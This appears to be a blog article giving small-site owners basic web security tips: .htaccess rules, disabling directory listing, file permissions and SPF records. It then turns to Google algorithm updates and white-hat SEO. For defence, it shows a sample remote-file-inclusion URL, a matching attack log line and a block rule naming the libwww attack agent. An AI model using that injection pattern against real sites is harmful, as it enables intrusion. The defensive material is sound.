In a perfect world, you'd be able to mind your own business and cheerfully run a successful online business without being harassed by "cyberthugs". Until that perfect world arrives, however, you'll need to slap a great big KEEP OUT sign on your website. That means configuring security settings that deny access to sensitive data and controls. This article will walk you through a few simple steps that will keep your website safe from hackers.

The Most Common Site Attacks

Unless you're the FBI, the IRS, the CIA, or some other high-profile organization handling sensitive data, you're unlikely to be targeted by sophisticated hackers. There are, however, plenty of amateur hackers who run automated scripts that probe ordinary websites for weak security and deface whatever they can get into.

As you can imagine, fixing the damage done by these "script kiddies" can be time-consuming, and all the while you could be losing business and credibility. Let's look at a few simple things you can do to keep these types of hackers from accessing your site.

Simple Site Security Measures

When you monitor your website's logs, you'll find that hack attempts typically come from the user-agent "libwww-perl". Requests with this user agent try to access pages (URLs) on your site in order to inject code or upload files. Once these scripts (often called "botnet" scripts) are injected or uploaded, they can wreak havoc on your website and disable many of your interactive features, such as server-side programs.

These types of hacks can be prevented by simply blocking requests from libwww-perl user-agents and requests whose URLs include the string "=http:". "=http:" is a common pattern used by hackers trying to make your site fetch and run a malicious script or piece of software hosted on another site. For example:

http://www.example.com/page.php?id1=http://www.strangersite.com/id.txt?
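
In your site's raw access logs, such an attempt might look something like the following entry (the IP address, timestamp, and response size are hypothetical, shown in Apache's standard "combined" log format):

203.0.113.45 - - [17/Mar/2023:04:12:08 +0000] "GET /page.php?id1=http://www.strangersite.com/id.txt? HTTP/1.1" 200 4182 "-" "libwww-perl/6.05"

The two telltale signs are the "=http:" in the query string and the libwww-perl user-agent at the end of the line.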

This can be prevented by adding a few lines to your .htaccess file (assuming your site runs on Apache with mod_rewrite enabled) that block both libwww-perl user-agents and any request whose query string tries to pass in another URL:

# Block libwww user agents and query strings that inject a URL
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
RewriteRule ^(.*)$ - [F,L]

The [F] flag returns a 403 Forbidden response to any request that matches either condition. If your .htaccess already turns the rewrite engine on, you don't need to repeat that line.

In addition to blocking access from potentially harmful user agents, you'll want to disable directory browsing on your website. When directory browsing is enabled, visitors can list the contents of the directories/folders that hold your files: your web pages, your CSS files, and anything uploaded to your server. You can disable directory browsing using the following steps:

  • Click on the "Index Manager" option in your cPanel.
  • Click on the directory/folder on which you wish to disable browsing.
  • Select the “no index” option and save your settings.

Once you've done this, you can double-check the setting by typing the directory's URL into your browser; you should no longer see a file listing. Repeat these steps for every directory on which you want to disable browsing, which (with very few exceptions) means all of them.
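
If your host doesn't offer an Index Manager, or you'd rather not click through a control panel, the same result can usually be achieved directly in the .htaccess file of the directory in question (again, assuming an Apache server):

Options -Indexes

With this line in place, a request for the bare directory URL returns a 403 Forbidden error instead of a listing of the files inside it.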

Other Security Precautions to Consider

In addition to disabling directory browsing and blocking libwww-perl access, have your web programmer change any forms or scripts that use the GET method so that they use POST instead. Without getting into a VERY detailed explanation of the difference, GET places submitted data in the URL's query string, where it shows up in logs and bookmarks and is easy to tamper with, while POST sends the data in the body of the request. For typical form handling there's really no difference in what the two can do, so there's little reason not to make the switch.
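
As a rough illustration (the contact.php handler and the email field here are purely hypothetical), the change usually amounts to swapping the form's method attribute and having the server-side script read the POST data instead of the query string:

<!-- Before: the submitted value ends up in the URL, e.g. /contact.php?email=... -->
<form method="get" action="contact.php">
  <input type="text" name="email">
  <input type="submit" value="Send">
</form>

<!-- After: the submitted value travels in the body of the request instead -->
<form method="post" action="contact.php">
  <input type="text" name="email">
  <input type="submit" value="Send">
</form>

In a PHP handler, that means reading $_POST['email'] rather than $_GET['email'].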

Also, before you change any of your file permissions to 777 (read/write/execute for everyone), be sure that you have a specific reason for doing so. Most of the time, it's better to leave these changes to your web programmer. If you purchase a piece of server-side software that requires you to set permissions to 777, research it thoroughly on the major search engines before using it, and proceed with caution.
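
For reference (the file and directory names below are only examples), the conventional, safer defaults on most Linux web hosts are 644 for files and 755 for directories, set from a shell like this:

# Owner can write; everyone else can only read (and, for directories, traverse)
chmod 644 config.php
chmod 755 uploads/

# 777 gives every user on the server full read/write/execute access - use only when truly required
chmod 777 uploads/tmp/

If a piece of software insists on 777, keep that permission confined to the one directory it actually needs.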

If you need the help of a web programmer to complete any of the above tasks, you can hire one, and these simple steps should take them no more than an hour. In fact, you can also have them create your robots.txt file, set up file compression, and create your meta tags, all of which amounts to a reasonably small and inexpensive job.

These simple security measures will keep most cyberthugs out of your website. If you feel that your site might become the target of more experienced and determined hackers, your next course of action would be to hire a professional web security consultant. However, unless you’re a high-profile organization with supersensitive and valuable data on your site, these measures alone will most likely solve your security concerns.

Protecting Your Email Information

Protecting your email information and email addresses is another crucial aspect of security. Hackers and spammers are always searching for website owners' and users' personal information they can exploit. If they succeed, it not only damages your website's credibility, it also hurts your email deliverability rate and, therefore, the revenue and ROI from your email marketing campaigns.

One of the most important things you can do to protect your email information is to add an SPF (Sender Policy Framework) record. An SPF record is a type of Domain Name System (DNS) record that lets receiving mail servers check whether a message claiming to come from your domain was actually sent by a server you've authorized, and reject it if it wasn't.
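
SPF information is published as a plain TXT record in your domain's DNS. As a sketch only (the domain and mail setup are hypothetical), a site that sends mail from its own server and through Google's mail servers might publish something like this:

example.com.  IN  TXT  "v=spf1 mx include:_spf.google.com ~all"

Here mx authorizes the hosts listed in the domain's MX records, include:_spf.google.com authorizes Google's outgoing mail servers, and ~all tells receiving servers to treat mail from any other source with suspicion.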


Watch the following video to learn how to add an SPF record.

Algorithm Changes Hurting Your Website

By choosing to use SEO as the main marketing technique, we give up a portion of our control to a third party. That third party is Google.

Cooperating with Google and adhering to their standards can bring high rewards, so the trade of control is usually worth it. Google gets new websites that will hopefully answer their users' search queries, and we internet marketers get targeted traffic in return. Seems like a fair trade. However, it doesn't always work out this well.

Within the past two years, Google has been releasing algorithm updates on a large scale, each targeting different types of websites. The Mayday Update, for example, went after "Google sniper" websites (sites with only a page or two of content, built with the sole purpose of ranking highly with as little effort as possible and then selling products or collecting emails) that gamed Google's algorithm and filled popular search results with spam. With the Mayday Update, many marketers' full-time incomes were gone overnight.

Google followed this with the Panda Update. Although this update was more subtle, the results were staggering. Massive sites which were previously viewed as authority websites lost huge portions of their traffic.

The story doesn't end there. With each of these updates, Google has cleared more spam content and filler niche websites off the web. Those spam sites aren't the only ones affected, though. Much like a food chain, when you disrupt one group of websites you affect everything around it: an algorithm update can drastically change rankings for ALL websites on the internet, even white hat ones.

In today’s article, we’ll go over a few essential tips to help your website weather any future algorithm updates.

Create a Fantastic User Experience

The first and most important factor to remember might seem quite obvious at first. Provide each visitor to your website with a great browsing experience.

Have you ever had this experience? You search Google looking for answers and the first site you visit is exactly what you’re looking for. This is the effect we need to duplicate with our own websites.

Although this factor is obvious, it's too often neglected due to laziness or lack of time. It's not easy to create a great user experience. You need to provide quality content and test it multiple times. Determine what the market wants out of your website and deliver that experience. If you can deliver the ideal experience to your visitors, your odds of avoiding damage in a future update are dramatically increased.

Outsourcing Content? Quality Check!

Content creation can be an extremely time-consuming process. Each new website created requires pages and pages of fresh content. If your goal is to run a large authority website, you’ll need hundreds of pages of content. For this reason, outsourcing content is extremely popular.

Outsourcing can be a double-edged sword. When you outsource content, you're again putting control in the hands of someone else. If you have great writers working for you, this isn't a problem. If you're on a lower budget, however, you may find that your written content suffers.

With the Panda Update, it has become clear that Google uses content as a massive factor when determining which websites are spam or fluff. It’s more important than ever to hire competent writers and create quality unique content.

Expert or Authority?

The Mayday Update showed us exactly what Google thinks of "filler websites." If your website is not an expert or authority in your niche, your chances of being hit by a future update increase exponentially.

Expert and authority status is gained through content and consistency. If you can provide excellent content within one area of your niche, you will gain authority in that specific area. At this point, it’s time to expand into other parts of your niche. This process demands fresh content for each area you expand into. If all this content is spot on and well written, Google will begin viewing your website as an authority within your niche.

Although the Panda Update hit several well-known "authority websites," those sites had blatantly played against the unwritten law of quality content, and as a result they were penalized. It's worth noting that even though these websites were obviously churning out subpar content, Google was extremely hesitant to pull the trigger on them precisely because they were authority sites (although they finally did).

If you run an authority website with quality content, you’re in an excellent spot for the long term.

Only Follow White-Hat SEO Practices

Last but not least, stick with white hat SEO. It can be tempting to spam links and manipulate Google’s algorithm, but this can be detrimental to your website’s success. SEO takes time, and the only way to speed up that process is to game the search engine.

As we've seen in the past, though, black and grey hat SEO can spell disaster for your website's future. It's always worth it to go 100% white hat. It might take more time, but you can be sure your website's future is far more stable than that of a site ranking thanks to shady and manipulative SEO techniques.

Stay Updated on what Google is Doing!

Although Google has the final word on how your website ranks, by creating excellent content and sticking to white hat SEO, your website will have the best possible chance of succeeding regardless of future updates.

If you’d like to keep updated on the latest Google algorithms, feel free to sign up for our weekly newsletter. Simply enter your name and e-mail to receive info on the latest SEO and internet marketing strategies for free!